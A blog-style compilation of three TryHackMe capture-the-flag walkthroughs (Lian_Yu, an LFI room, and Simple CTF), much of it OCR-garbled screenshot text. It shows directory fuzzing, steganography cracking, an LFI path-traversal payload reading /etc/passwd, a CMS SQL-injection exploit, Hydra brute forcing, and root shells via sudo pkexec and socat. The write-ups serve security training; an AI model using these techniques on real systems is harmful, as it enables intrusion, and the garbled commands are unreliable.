TryHackMe I Lian_Yu X Kali Linux Kali Training Purgatory @ 10.10.166.38 Kali Tools Kali Docs Kali Forums NetHunter Offensive Security •s Exploit-DB •e GHDB MSFU ARROWVERSE Q)liver Jonas "Ollie" Queen was a former billionaire playboy, turned archer superhero of Star City. Lost from society after his family's yacht sank, Oliver made it to the island of Lian Yu, where he went on a mission of survival and self-discovery, learning skills that include, and aren't limited to, archery, swordsmanship, hand-hand c tc. He traveled to China and Russia on missions as an agent of A.R.G.U.S. for some time, became a member of the Bratva know s Kapot, and the murderous igilante Luchnik/Kapiushon. After being presumed dead and lost at sea for five years, Oliver retumed ho e;øwith'a ion to •eve his' Cit m crime and corruption. He began his crusade s the Hood, who •was willing to use by targeting members on his father's as an archer who would eventually beco list. Imagine you were-de erte on fiveyears and yoUhad nothing but a boy and arrew t"süöivx . Lian Yu is a large, Chin@Sea in the •Universe. It has everytßing you need to survive Such astig , mountains, and you mountainous island in the

We’ve understood, its a television series, except this we didn’t get any other information. Now let’s try “Gobuster” tool. Gobuster is a tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support).

gobuster dir -u http://1ø.1ø.166.38 -w /usr/share/dirbuster/word1ists/directory-1ist-10wercase-2.3-medium. txt Gobuster v3.ø.1 by OJ Reeves (OTheC010nia1) & Christian Mehlmauer (a_FireFart_) Uri: [+] Threads: [+] Wordlist: [+] Status codes: [+] User Agent: [+] Timeout: http://1ø.1ø.166.38 / usr/share/dirbuster/wordlists/directory-list-l owercase-2.3-medium. txt gobuster/3.ø.1 IOS 2020/07/23 starting gobuster /island (Status: 301) 9M 207 rogress: 2026

“Gobuster” says, there is a directory called “/island“. Lets try the /island in the URI

TryHackMe I Lian_Yu x Kali Linux Kali Training 10.10.166.38/island/ @ 10.10.166.38/island/ Kali Tools Kali Docs Kali Forums NetHunt Ohhh Noo, Don't Talk I wasn't Expecting You at this Moment. I will meet you there You should find a way to Lian_Yu as we are planed. The Code Word is:

Web page doesn’t contain any useful information. Let us see what is in the background of the page,

Ohhh Noo, Don't Talk I wasn't Expecting You at this Moment. I will meet you there You should find a way to Lian_Yu as we are planed. The Code Word is: Save page As... Save Page to Pocket Send Page to Device View Background Image Select All Yiew Page Source View Page Info Inspect Element (Q) Take a Screenshot

We’ve got a code word “vigilante”. at this moment we’ve no clue what it is? However we need to note down this details as a part of enumeration.

Step-2

We don’t have any details except the code word “vigilante”. Only option right now we have is brute force considering the vigilante is a username.

To do brute force, we need to download the SecList. Now you may wonder what is this SecList? SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments.

For more info visit https://github.com/danielmiessler/SecLists

Since it is not available in Kali Linux, we need to install it separately. The installation of SecLists is as follows

@ https://github.com/danielmiessler/SecLists Ili Linux Kali Training master . Kali Tools •b Kali Docs Kali Forums 1 branch 11 tags NetHunter Offensive Security Go to file Exploit-DB Add file Clone with HTTPS O GHDB n Code Use SSH gotmilk Merge pull request #466 from bugbounty69/master Discovery Fuzzing 'OCS Merge pull request #473 from mrajput Use Git or checkout with SVN using the web URL. https://github.com/danie1miess1er/Se Add character that can break a Mongo Download ZIP Fix #259 - Recover from bad merge

Git clone the Seclists from the github as shown below

git clone https://github.com/danielmiessler/SecLists.git kaliakali:— Cloning intå • SecLisLs remote: Enumerating objects: 9232, done. remote: Total 9232 (delta 0), reused (delta 0), pack-reused 9232 Receiving objects: 100% (9232/9232), 703.41 MiB | 1.67 MiB/s, done. Resolving deltas: 100% (4776/4776), done.

Now we’ve downloaded the Seclist, lets brute force using the “ffuf“. Ffuf is a fast web fuzzer written in Go.

fuf -u http: //10.10.166.38/is1and/F-uzz -w /usr/share/wordlists/SecLists/Fuzzing/4-digits-øøøø-9999 .txt v_/ vi.ø.2 . Method URL Follow redirects Calibration Timeout Threads . Matcher 2100 Progress: GET http://10.10.166.38/is1and/FUZZ false false Response status: [Status: 301, Size: 240, Words: 14, Lines: Duration : 8] [10000/10000] . 30b [1/1] 222 req/sec :: Errors :

As a result of fuzzing with ffuf, we got a directory “2100“. Let’s see what information we will be getting in 2100 directory in the URL.

We got .ticket, again we need to fuzz to get more information. The idea of fuzzing is to understand any entries which are ending with .ticket

kaliakali:— f f uf -u http: 10.10.1.105/is1and/21øø/FUZZ. ticket -w usr share/dirbuster/word1ists/directory-1ist-2.3-medium.txt v_/ v_/ v_/ vi.ø.2 . Method URL Follow redirects Calibration Timeout Threads . Matcher GET http : //10.10.1.105/is1and/21øø/FUZZ. ticket false false Response status:

As a result of fuzzing, we’ve got “green_arrow”.

# Priority ordered case sensative list, where entries were found Lines: Lines: Lines: [Status: 17] 17] 7] 200, Size : 292, Words : 27, Lines: 17] green _ arrow Progress : [Status: 200, Size: [Status: 200, Size: [Status: 200, Size: 220560/220560] . 30b [1/1] 292, words: 27, 292, words: 27, 71, words: 10, 235 req/sec :: Duration: [0:15:37] Errors :

Let us search for green_arrow.ticket in the uri

Kali Linux Kali Training This is just a token to get RTy8yh80dscx G) view-source:http://10.10.1.105/island/2100/green_arrow.ticket Kali Tools •b Kali Docs Kali Forums NetHunter Offensive Security into Queen's Gambit(Ship)

We got another code similar to “vigilante” ie “RTy8yhBQdscX“. Let us ask our best friend “Google”. Google said, its Base58 encryption. Lets decode using Base58 Decoder

Kali Tools .browserling.com/tools/base58-decode NetHunter n Offensive Security •u Exploit-DB Kali Docs Kali Forums Base58 Decoder web developer and programmer tools •S GHDB World's simplest base58 decode. Just paste your data in the form below, press Base58 Decode button, and you get a base58 decoded string. Press button, get string. No ads, nonsense or garbage. Like SIK Announcement: We Just launched SCIURLS - a neat science news aggregator. Check it out!

The output of the Base58decoder seems like a password “!#th3h00d”. Lets note it down and try it out with ftp, which is already running in port no 21.

Step-3

When we did our initial scanning with Nmap we found ftp service is running on port 21 and its OPEN. Now we’ve username “vigilante” and password “!#th3h00d”

ftp 10.10.1.105 Connected to -10.10.1.10 220 (vsFTPd 3.Ø.2) Name (10.10.1.105:ka1i): vigilante 331 Please specify the password. Password : 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. PORT command successful. Consider using PASV. 150 Here comes the directory listing. rw-r —r rw-r—r rw-r—r ftp) 511720 May 01 03:26 .png 549924 May 05 11:10 Queen' s_Gambit.png 191026 May 01 03:25 aa.jpg

Here we go! we got access to ftp. When we tried “ls” command to see the contents in the present working directory, we got three images. To check any hidden files in the directory we’ve used the command “ls -al”

ftp) Is -al 427 Entering assive Mode 150 Here comes the directory listing. drwxr-xr x 11:1 drwxr-xr x 05:38 -rw-r—r -rw-r—r -rw-r—r -rw-r—r -rw-r—r -rw-r—r 03:2 -rw-r—r 1001 1001 1001 1001 1001 send OK. 1001 1001 1001 1001 1001 4096 4096 44 220 3515 2483 675 511720 549924 191026 May May May May May May May May May May 05 01 01 01 01 01 01 01 05 01 05 05 05 03 11 : 38 :3E :3E :IC . bash _ history . bash_logout . bashrc .other user .profile Leave_me_alone . png Queen ' s_Gambit . png aa. 226 Directory

As a result of command execution we saw that there are many hidden files which needs to be copied to local system for further investigation. Using the get command we’ve copied the all files to the local system ie Kali machine.

ftp> get .png te: .png 227 Entering Passive Mode 150 Opening BINARY mode data connection for .png (511720 bytes). 226 Transfer complete. 511720 bytes received in 3.76 secs (132.9663 0/s) •ftp) get Queen s_Gambit.png te: Queen ' s_Gambit .png queen .png r 227 Entering Passive Mode 150 Opening BINARY mode data connection for Queen' s_Gambit.png (549924 bytes). 226 Transfer complete. 549924 bvtes received in 2.73 secs (196.9627 kB/s) ftp) get aa.jpg aa.jpg -Local: aa.jpg re 227 Entering Passive Mode 150 Opening BINARY mode data connection for aa.jpg (191026 bytes). 226 Transfer complete. 191026 bytes received in 1.15 secs (162.8378 kB/s)

We’ve created a directory in the Kali machine and copied all the files into it.

kaliäll(al total 1268 drwxr-xr-x 13:15 drwxrwxr-x 13:15 12:11 -rw-r—r -rw-r—r 12:19 -rw-r—r 12:19 -rw-r—r 13:14 -rw-r—r -rw-r—r 12:19 -rw-r—r 12:18 -rw-r—r 3 kali kali 33 kali 1 kali 1 kali 1 kali 1 kali 1 kali 1 kali 1 kali kali kali kali kali kali kali kali kali kali kali -al 4096 4096 191026 596 44 511720 2483 333 675 549924 Jul Jul Jul Jul Jul Jul Jul Apr Jul Jul 23 23 23 23 23 23 23 28 23 23 12 02 : 56 : 06 aa.jpg.out . bash _ history Leave me alone.png .other user passwd . txt .profile " Queen ' s_Gambit . png

Sometimes what happen is , the information we are looking for may be hidden in the picture, this is called Steganography. Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.

We need to use Steghide program to extract the information from the image

steehide extract Enter passphrase: -sf aa.jpe

Unfortunately it is asking for password and we don’t know the password. Now we need to crack the password. For that we need to download StegCracker from the github. Once git hub files downloaded,use StegCracker to crack the password to open the image file.

rootakali git clone https://github.com/paradoxis/stegcracker.git Cloning i Rto"' StegCracker . remote: Enumerating objects: 61, done. remote: Counting objects: 100% (61/61), done. remote: Compressing objects: 100% (41/41), done. remote: Total 247 (delta 23), reused 45 (delta 15), pack-reused 186 Receiving objects: 100% (247/247), 1.64 MiB | 968.00 KiB/s, done. Resolving deltas: 100% (109/109), done.

Using the StegCracker, we’ve identified the password. The password is “password”

k 1 ' Okal stegcracker aa.jpg /usr/share/wordlists/rockyou.txt StegCracker 2.0.9 —Chttps : // thub . com/Paradoxis/StegCracker) Copyright (c) 2020 Luke Paris (paradoxis) Counting lines in wordlist „ Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt' Successfully cracked file with password: password Tried 964 passwords as been written to: aa.jpg.out assword

Step-4

Next step is to crack the image file with the password using the Steghide command.

steghide extract -sf aa.jpg Enter passphrase: wrote extracted data to "ss.zip"

We’ve got a zip file “ss.zip” and unzipped using the unzip command. There are two files “passwd.txt” and “shado”. To see the content, we have used cat command.

unzip ss.zip Archive: ss.ZID inflating: passwd . txt inflatin shado lanYii$

cat passwd .txt This is your visa Land on Lian_Yu # Just for Fun *** a small Note about it Having spent years on the island, Oliver learned how to be resourceful and set booby traps all over the island in the common event he ran into dangerous people. The island is also home to many animals, including pheasants, wild pigs and wolves.

We didn’t get any information from the passwd.txt but we got a password from shado ie “M3tahuman”.

At this moment we are not sure about “M3tahuman” is the password. we need to see the content of other files which we’ve copied from the victim’s machine.

Step-5

.other _user” file is one of the hidden file which we copied to local system for investigation. Let us see contents of the .other_user file.

Using cat command viewed the contents of .other_user

cat .other_user Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Was hington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of w arfare. She immediately fell in love with him and realized that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to pr ivately train Slade in guerrilla warfare. In less than a year, Slade mastered every fighting form presented to him and was soon promoted to the rank of lieutenant col onel. Six months later, Adeline and he were married and she became pregnant with their first child. The war in Vietnam began to escalate and Slade was shipped oversea s. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Wintergreen, to whom he would later return the favor. Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge. [7] However, Slade kept this career secret from his family, even though his wife was an expert military combat instructor. A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was against his personal honor code. He attacked and killed the kidnappers at the rendezvous. Unfortunately, Joseph's throat was slashed by one of the cr iminals before Slade could prevent it, destroying Joseph's vocal cords and rendering him mute. After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, his confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless h alf covering his lost right eye. Without his mask, Slade wears an eyepatch to cover his eye.

From the paragraph, we found a name “slade” and word “metahuman”. This could be the username and password would be “M3tahuman”. However let’s try with FTP.

tp -p 10.10.1.105 Connected to 10.10.1.105. 220 (vsFTPd 3.0.2) Name (10.10.1.105:kali): stade 530 Permission denied. Login failed. ftp> exit 221 Goodbve.

FTP didn’t recognize the username and password. Let’s try SSH with same credentials.

ssh slademø.1ø.1Q105Ä slade01ø.1ø.f.105Ts password: way To SSH Loading.. ...Done Connecting To Lian_Yu Happy Hacking URN-YU ladeOLianYu : -$

Here we go, we’ve got access to SSH as user with limited privileges. User name is LianYu. As usual let’s see all the files which are there in the present working directory using the “ls” command. We found a text file “user.txt”. To view the content we’ve used cat command.

cat user. txt COMPUT3R5_DON 'T Felicity Smoak

Here we go! we got the user flag. Now we need to find the root user flag.

Step-6

We got a shell with a normal user. To get root flag, we need to have root user privileges. For that we need to escalate the privilege form normal user to root user.

As a first step. let us check what are the files and programs does LianYu have permission to access as a sudo user. For that we’ve executed “sudo -l” command.

kudo -l [sudo] passworcf for s a e: Matching Defaults entries for stade on LianYu: env_reset, mail_badpass, /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin User stade mav run the following commands on LianYu: (root) PASSWD: /usr/bin/pkexec sla

As a sudo, LianYu can run the following command “/usr/bin/pkexec“,. In this we use GTFO bin. GTFO is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.For more info https://gtfobins.github.io/.

Sudo Sudo It runs in privileged context and may be used to access the file system, elevated privileges if enabled on sudo . sudo pkexec / bin/sh escalate or maintain access with

We’ve copied the command “pkexec /bin/sh“, to spawn the root shell we are going run the command as sudo user.

sLadeaLianYu # whoami h•oot udo pkexec /bin/sh

Her we go!, we’ve got root access. As a first step, we have to check the files in the present working directory using the “ls” command. We found a .txt file “root.txt”

whoami root pwd /root # Is

Using the cat command we viewed the content and got the root user flag.

cat root.txt Mission accomplished You are injected me with Mirakuru:) —i Now stade Will become DEATHSTROKE. — DEATHSTROKE Let me know your comments about this machine : ) I will be available atwitter user6825

Conclusion

I believe, you enjoyed today’s box Lian_Yu on TryHackMe and learned new concepts like fuzzing, steganography and related tools. I would to like thank TryHackMe for making this box free(without being subscribed) and the author of the box Daemon. thanks .

Hack LFI Inclusion on TryHackMe

Today I am going to take you through a beginner level room on TryHackMe. From the name “LFI” itself we can understand what is this box all about.

First things first, so make sure you are connected to TryHackme VPN and you’ve deployed the machine.

sudö@envpn WebExercise .ovpn [sudo] password for Sat Sat Sat Sat Sat Sat Sat Jul Jul Jul Jul Jul Jul Jul 25 25 25 25 25 25 25 ka UI : 2020 2020 2020 2020 2020 2020 2020 openVPN 2.4.9 x86_64-pc-1inux-gnu [SSL (openSSL)] [LZO] [LZ4] [EPOLL] [PKCSII] [MH/PKTINFO] [AEAD] built on Apr 21 2020 library versions: OpenSSL 1.1.1g 21 Apr 2020, LZO 2.10 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication TCP/UDP: Preserving recently used remote address: øø Socket Buffers: UDP link local: Iino R-[212992+212992] S-[212992+212992] (not bound) r AZ T NC T 11 Q 1 •0
Active Machine Information Title inclusion Address IP 10.10. 244.98 Expires Add 1 hour 59m 56s Terminate

If machine is deployed, next step is to check the pinging with the TryHackMe machine to make sure it is working properly.

Tj:-$ ping 10.10.244.98 56(84) bytes PING 10.10.244.98 (10.10.244.98 tt1=63 1 cmp_seq=l lcmp_seq= lcmp_seq= lcmp_seq= 10.10.244. lcmp_seq= 64 64 64 64 64 bytes bytes bytes bytes bytes from from from from from 10.10.244 10.10.244 10.10.244 10.10.244 .98: .98: .98: .98: 98: 2 ttl=63 3 ttl=63 4 ttl=63 5 ttl=63 of data. time= 213 time- -195 time- -169 time- -229 time= 207 ms ms ms ms ms

Now everything is ready,Let’s start our hacking!

Step-1

First step is always start with the basic Nmap scanning, nmap <target IP>

Inmap 10.10.244.98 kaliakali Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 00:23 EDT Nmap scan report for 10.10.244.98 Host is up (0.18s latency). Not shown: 998 closed ports PORT STATE SERVICE 2/tcp open ssh ø/tcp open http

From the scanning output, we understood, there were two services running on port no 22 and port 80. Let’s explore more on HTTP service on the URL

10.10.244.98 Kali Tools •b Kali Docs Kali Linux Home Kali Training Kali Forums NetHunter Offensive Security Exploit Hello, world! Welcome to my blog. This is currently in its early stage but you can find some articles that I've wrote. Learn more »

The blog is explaining different attacks like Local File Inclusion and Remote Server File Inclusion etc..Let’s click the view details in LFI – attack

LFl-attack Local file inclusion attack is the one using which you can include any localfile i.e all the files that are present on the server if the permission is right on the file. The most common file on unix that we can check for is letc/passwd View details »

When we viewed the details,we could find few examples for LFI-attack.

Kali Linux Kali Training 10.10.244.98 larticle?name=lfiattack NetHunter n Offensive Security •S Exploit-DB Kali Tools •b Kali Docs Kali Forums GHDB n MSFU An attacker can use Local File Inclusion (LFI) to trick the web application into exposmg or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement. Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI). The following is an example of PHP code that is vulnerable to LFI. P* * Get the filename from a GET input * Example - http://example.com/?file=filename.php *l $file = $ GET['file']; * Unsafely include the file * Example - filename.php *l include('directory/' . $file); In the above example, an attacker could make the following request. It tricks the application into executing a PHP script such as a web shell that the attacker managed to upload to the web server. http://example.com/?file=../../uploads/evil.php In this example, the file uploaded by the attacker will be included and executed by the user that runs the web application. That would allow an attacker to run any server-side malicious code that they want. This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file. Directory Traversal Even without the ability to upload and execute code, a erous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows h ://exam le.com/?file=../../../../etc asswd In the above example, an attacker can get the contents of the letc/passwd file that contains a list of users on the server. imilarly, an attacker mayleverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack. taken from https://www.acunetix.com /blog/articles/local-file-inclusion-lfi/

We can also check whether the website is vulnerable to LFI, by copy pasting the above mentioned example in the URI,

Ill \ Kali Linux Kali Training @ 10.10.244.98 GHDB n MSFU NetHunter n Offensive Security •S Exploit-DB Kali Tools •b Kali Docs Kali Forums bin:x:2:2:bin:/bin:/usr/sbin/nologm sys:x:3:3:sys:/dev:/usr/sbin/nologm sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin Ip:x:7:7 Isbin/nologin uucp:x: 10 : 10 prmy• 13 : 13 :prmy• www-data :x:33 :33 :www-data :/var/www:/usr/sbin/nologm ba ckups:/usr/sbin/nologin list:x:38:38:Mailing List gnats:x:41 :41 :Gnats Bug-Reporting System Ilib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin Network Management„,:/run/systemd Inetif:/usr/sbin/nologm systemd-resolve:x: 101 : 103 :systemd Resolver„, syslog:x: 102: 106: messagebus:x: 103 : 107 : _ apt:x: 104:65534: Ixd:x: 105 :65534: uuidd:x: 106: 110::/run /uuidd:/usr/sbin/nologin dnsmasq:x:107 :/usr/sbin/nologin : 112::/Var/lib/landscape:/usr/sbin/nologm pollinate:x: 109: 1 Icache/pollinate:/bin/false falconfeast:x:1000: 1000 #falconfeast:rootpassword sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111 : 116:MySQL Server„,

Here we go! we were able to access the passwd file. From the passwd file we understood, the user “falconfeast” password is mentioned in the passwd file ie “rootpassword

messagebus:x: 1 03: 107::/nonexistent:/usr/sbin/nologin _apt:x: 104:65534::/nonexistent:/usr/sbin/nologin Ixd:x: 1 05:65534::/var/lib/lxd/:/bin/false uuidd:x: 1 06: 1 10::/run/uuidd:/usr/sbin/nologin dnsmasq:x: 107:65534:dnsmasq,„:/var/lib/misc:/usr/sbin/nologin andscape:x: 1 08: 1 12::/var/lib/landscape:/usr/sbin/nologin ollinate:x:109:1::/var/cache/ ollinate:/bin/false falconfeast:x: 1000: 1000 :falconfeast, home/falconfeast:/bin/bash #falconfeast:rootpassword mysql:x:111:116:MySQL Server,„:/nonexistent:/bin/false

Step-2

Now we’ve the username and password, lets try ssh

ssh ssh falconfeast01ø.10.244.98 ssh: Could not resolve hostname ssh: Name or service not known ssh falconfeast01ø.10.244.98 The authenticity of host '10.10.244.98 (10.10.244.98)' can't be established. ECDSA key fingerprint is Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.244.98' (ECDSA) to the list of known hosts. falconfeast01ø.10.244.98's password: Permission denied, please try again. falconfeast01ø.10.244.98's password: welcome to Ubuntu 18.04.3 LTS x86_64) * Documentation: * Management: * Support: https : //help.ubuntu.com https://landscape.canonical.com https : //ubuntu.com/advantage System information as of Sat Jul 25 10:23:46 IST 2020

Here we go!, we got access to shell. As a first step we’ve checked the ID. The user is also part of the sudo group

fat con feastainclusion : uid=løøø(falconfeast) fal con feastainclusion : -

Let’s see what are the files or programs falconfeast can access as a sudo user

We’ve got to know from the output that no password is required to run the /usr/bin/socat. In such cases we normally search the options in GTFO bins. For more info https://gtfobins.github.io/

Step-3

Let’s look for /usr/bin/socat in the GTFO bins.

GTFOBins star 3,046 GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells; escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells; and facilitate the other post-exploitation tasks See the full list of functions. This was inspired by the LOLBAS project for Windows. GTFOBins is a collaborative project created by Emilio Pinna and Andrea Cardaci where everyone can contribute with additional binaries and techniques Shell Command Reverse shell Non-interactive reverse shell Bind shell File upload File download File write File read Library load SIJID Limited SLID socat Non-interactive bind shell Sudo Capabilities

We’ve to search the socat in GTFO bins,

socat Binary Functions

We’ve selected the shell because by using this we can spawn a root shell

I Shell It can be used to break out from restricted environments by spawning an interactive system shell. The resulting shell is not a proper TTY shell and lacks the prompt. socat stdin exec: / bin/ sh

We’ve copied the command and executed as a sudo permission,

faVconfeastaincIusion : sudo socat stdin exec: /bin/sh id gid=ø(root) groups=ø(root)

Here we go!, we got access to shell as a root user. now check the present working directory and list down all the directories in the present working directory.

pwd /home/falconfeast

Using ls command we’ve found, there is a text file “user.txt”. Again using the cat command viewed the content in the user.txt.

Is articles user . txt cat user. txt 60989655118397±45799

We’ve got the answer for the first question in the TryHackMe

Similarly we need to find the root flag, now switch to root directory

cd / pwd d root root. txt cat root. txt 42964104845495153909

Her we go!, we’ve got the root flag and answer for the second question in the TryHackMe

root flag 42964104845495153909 Correct Answer

Conclusion

i hope you enjoyed today’s box LFI on TryHackMe and learned something new. I would to like thank TryHackMe for making this box free(without being subscribed) and the author of the box falconfeast. Thanks .

Simple CTF – TryHackMe

Today I am going to take you through how to crack a simple CTF box in TryHackMe. Though the challenge name is Simple CTF, it is not that simple, and we are going to learn why it is not that simple and how we can solve the challenge.

In this particular challenge, there are 10 questions and we are going to solve one by one.

Step-1

As usual, make sure you are connected to the TryHackMe VPN.

Wed Wed Wed Wed Wed Wed Wed Jul Jul Jul Jul Jul Jul Jul 22 22 22 22 22 22 22 2020 2020 2020 2020 2020 2020 2020 sudo openvpn WebExercise .ovpn OpenVPN 2.4 .9 x8b_b4-pc- Llnux-gnu L SSL (OpenSSL)] [LZO] [l library versions: OpenSSL 1.1.1g 21 Apr 2020, LZO 2.10 Outgoing Control Channel Authentication: Using 512 bit me: Incoming Control Channel Authentication: Using 512 bit me: TCP/UDP: Preserving recently used remote address: [AF_INE Socket Buffers: UDP link local: llnD I R-[212992+212992] S-[212992+212992] (not bound) r AS T NET 112

Now deploy the machine in the Tryhackme and note down the IP address. In case if the system expires, you can extend by clicking the Add 1 hour.

Active Machine Information Title EasyCTF IP Address 10.10.174.106 Expires Add 1 hour 59m 24s

Once system deployed, ping the TryHackMe machine from our machine.

ping 10.10.174.106 PING 10.10.174.106 (10.10.174.106) 56(84) bytes of data. 64 bytes from 10.10.174.106: 64 bytes from 10.10.174.106: 64 bytes from 10.10.174.106: 64 bytes from 10.10.174.106: icmp_seq=l ttl=63 time=171 icmp_seq=2 ttl=63 time=155 icmp_seq=3 ttl=63 time=22ø icmp_seq=4 ttl=63 time=206 ms ms ms ms

Step-2

Now we are good to go! Let’s understand what are the services and ports are open in the remote machine using Nmap scanner. Use basic namp scan

nmap <ip address of the target system>

nmap -A <ip address of the target system>

From the nmap scan we got the answer for the TryHackMe 1st and 2nd questions

Step-2

Since port 80 is open,let’s explore HTTP connection in the web browser. We didn’t get any useful information other than Apache2 Ubuntu.

Step-3

Now Let’s start “Gobuster”. Go Buster is a tool used to brute-force the URIs (directories and files) in web sites and DNS subdomains (with wildcard support)

U gobuster dir -u http://1ø.1ø.174.106 -w /usr/share/dirb/wordlists/common.txt Gobuster v3.ø.1 by OJ Reeves (OTheC010nia1) & Christian Mehlmauer (a_FireFart_) Uri: [+] Threads: [+] Wordlist: [+] Status codes: [+] User Agent: [+] Timeout: 2020/07/22 /.hta (Status: 403) /.htpasswd (Status: /.htaccess (Status: /index.html (Status: /robots.txt (Status: http://1ø.1ø.174.106 /usr/share/dirb/wordlists/common . txt gobuster/3.ø .1 IOS Starting gobuster 403) 403) 200) 200) /server-status (Status: 403) O/kimple 301 2020/07/22 Finished

From Gobuster, we’ve understood, there is URI directory called “/simple”

Step-3

Now lets’s try the /simple in the web browser, as shown in the screen shot,

Kali Linux GMS G) 10.10.174.106 Isimple/ Kali Training Kali Tools •b Kali Docs Kali Forums Made simple NetHunter n Offensi

We’ve understood, there is a Content management system(CMS) is running. Most of the CMSs are vulnerable ,so let’s search for CVE’s and Exploit DB’s in Google.

When we Googled, we could find that CMS Easy is vulnerable to SQL injection.

We need to find login page corresponding to CMS Easy, so that we can make use of the above mentioned exploit. We’ve searched for the login page in the URI and we got it.

Login to CMS Made Sirr X v C) Ist-host.com /cmsms/admin/login.php x 14

Instead of domain name, we have assigned the IP address in the URL and we got the exact login page.

10.10.174.106 Isimple/admin/login.php Kali Tools •b Kali Docs Kali Forums O NetHunter n Offensive Security Exploit-DB GHDB Login to CMS Made Simplem user name User name Password Password Submit Cancel Forgotyourpassword? Copyright @CMS Made Simple"'

We’ve got the answer for the 3rd question in TryHackMe

Step-4

Now we need to execute the exploit. For that, first we need to download the exploit. Since this exploit is programmed in python, we need python in our local system.

The exploit is programmed in Python 2 version, in order to run the program in the latest version of python, we need to do some minor changes in the python code. If you are good at python you can modify, else you can make use of the online python converter.

pythonconverter.com Automated Python 2 to 3 code translation! This web is a online converter that reads Python 2.x source code and applies a series of fixers to transform it into valid Python 3.x code Enter your Python2 code on the left, hit the button, and boom, Python3 code on the right. put your Python2 Code Here... print Now try to crack password") crack_password() beautify_print() and your new Python3 code will appear here! def dump_pa global flag global passwor global output ord_password

We’ve uploaded the Python 2 version and the program got converted into Python 3.

We’ve got answer for the 4th question in TryHackMe.

Step-5

The python code is all about brute forcing the username. Hence we executed the command as shown in the screenshot. We’ve used the wordlist “rockyou.txt”, which is available by default in Kali linux machine.

(result, consumed) self. buffer_decode(data, self.errors, final) UnicodeDecodeError: 'utf-8' co .1 i.. rootakali: /home/kali/Desktop# python3 4663.py -u http://1ø.1ø.22ø.25/simp1e/ —crack -w /usr/share/wordlists/rockyou.txt

Once the exploit run, we got the below mentioned result, ie username “mitch”

Salt for password found: Idacød92e9fa6bb2 Username found mi t ch Email found: adminOadmin.com Now try to crack password Traceback (most recent call last): File "4663.py% line 184, in crack _ password( ) File "4663.py% line 53, in crack _ password for line in dict.readlines(): File "/usr/lib/python3.8/codecs .py% line 322, in decode (result, consumed) self self.errors, final) UnicodeDecodeError : 'utf-8' codec can't decode byte Oxfl in position 942: rootakali : /home/kali/Desktop# invalid continuation byte

Step-5

If we know user name, the next step would be finding the password. So in order to find the password, we are going to brute force the ssh using a tool called “Hydra“.

Again the rockyou.txt shall be used to brute force the password. The syntax for the brute forcing is the password shown in the screen shot.

The outcome of the brute force is password, and we got the password as “secret”.

We’ve got answer for the 5th question in TryHackMe

Now we have both username and password, so we can try for ssh login.

rootakali: /home/kali/Desktop# ssh mitch01ø.1ø.220.25 -p 2222 The authenticity of host ([10.10.220.25 :2222)' can't be established. ECDSA key fingerprint is SHA256: Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.220.25] :2222' (ECDSA) to the list of known hosts. mitch01ø.1ø.220.25' s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.ø-58-generic i686) https : //help.ubuntu.com * Documentation: * Management: * Support: https://landscape.canonical.com https : //ubuntu.com/advantage packages can be updated. updates are security updates. Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190

We’ve got answer for the 6th question in TryHackMe.

Through SSH, we’ve got access to shell as a normal user ie “mitch“. To list down the content of present working directory used the command “ls”. We ‘ve found the user.txt file , to view the content again we used, cat command as shown below.

$ whoami mitch $ pwd /home/mitch $ Is user . txt $ cat user. txt Good 306, keep

We’ve got answer for 7th & 8th question in TryHackMe

Step-6

Next step is to find out the flag in the root folder. for that we need to escalate the privileges to get the root user permission, then only we can access the root folder.

Lets try sudo -l to identify the current user file permission as sudo user.

$ sudo -L ser mitch mav run the_followinø commands on Machine: (root) NOPASSWD: /usr/bin/vim

The current user has sudo permission to run the vim located in the /usr/bin/.

